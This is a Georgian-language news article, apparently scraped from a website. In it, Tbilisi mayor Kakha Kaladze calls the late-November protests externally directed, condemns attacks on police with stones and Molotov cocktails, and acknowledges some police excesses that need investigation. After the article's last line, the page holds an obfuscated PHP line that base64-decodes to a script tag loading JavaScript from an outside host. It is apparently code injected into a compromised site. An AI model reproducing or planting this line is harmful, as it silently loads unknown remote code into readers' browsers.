celsiusi
ავერსი საქკაბელი

 დედაქალაქის მერი, „ქართული ოცნების“ გენერალური მდივანი კახა კალაძე 28-30 ნოემბერს გამართულ აქციებს „გარე ძალებიდან მართულს“ უწოდებს და აცხადებს, რომ სახელმწიფო თავისი ინსტიტუციებით ძალიან ძლიერია და არავის მიეცემა შესაძლებლობა, საქართველოში „ნაცმაიდანი“ მოაწყოს.

როგორც კალაძემ აღნიშნა, ნებისმიერ ადამიანს შეუძლია საკუთარი მოსაზრება გამოხატოს სხვადასხვა ფორმით, თუნდაც მიტინგით, მაგრამ ეს კანონის ფარგლებში უნდა იყოს.
„ცხადია, საიდან იმართება ის, რაც ხდება. ეს ყველაფერი გარე ძალებიდან მართული პროცესია, რასაც შიდა რადიკალური დაჯგუფებები ახორციელებენ. გუშინ და გუშინწინ ვიხილეთ ძალადობრივი მიტინგი, რაც კატეგორიულად მიუღებელია. ქვეყანაში სიტყვის და გამოხატვის თავისუფლება დაცულია. ნებისმიერ ადამიანს შეუძლია მისი მოსაზრება გამოხატოს სხვადასხვა ფორმით, თუნდაც მიტინგით, მაგრამ ეს კანონის ფარგლებში უნდა იყოს. კატეგორიულად მიუღებელია პოლიციელებისთვის შეურაცხყოფა, ბოთლების და ქვების სროლა. გუშინ საერთოდ საოცრება ვიხილეთ - „მოლოტოვის კოქტეილებს“ ესროდნენ პოლიციელებს. ეს ძალიან მძიმეა. დღეს სახელმწიფო ძალიან ძლიერია თავისი ინსტიტუციებით და არავის მიეცემა შესაძლებლობა, რომ საქართველოში „ნაცმაიდანი“ მოაწყოს“,- განაცხადა კახა კალაძემ.
გარდა ამისა, კალაძის თქმით, პოლიციის მხრიდან ძალის გადამეტების ცალკეული ინციდენტები იყო, რასაც მოკვლევა დასჭირდება.
„სამწუხაროდ, იყო ცალკეული ინციდენტები [პოლიციის მხრიდან ძალის გადამეტების], მაგრამ თანმიმდევრულად რომ მივყვეთ, როგორ ვითარდებოდა მოვლენები: როდესაც აქცია გაქვს დაანონსებული, იკრიბები, შეკრების თავისუფლება დაცულია, არავინ გიშლის. გადი, ჩაატარე შენი აქცია, მიტინგი, გამოთქვი მოსაზრებები, მაგრამ პოლიციელებს, რომლებიც უბრალოდ დგანან, მიდიხარ, აყენებ სიტყვიერ შეურაცხყოფას, ესვრი ქვებს, ბოთლებს, ამასაც არ ჯერდები, მოლოტოვის კოქტეილების დამზადება და პეტარდების სროლა ხდება, მძიმე კადრებია, ეს იწვევს დაძაბულობას. მძიმეა, რაც ვიხილეთ. რა თქმა უნდა, იყო ცალკეული შემთხვევები, რომლებიც შემაშფოთებელია. ყველაფერს დასჭირდება მოკვლევა და შესაბამისი გადაწყვეტილების მიღება“,- განაცხადა კალაძემ.
77
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");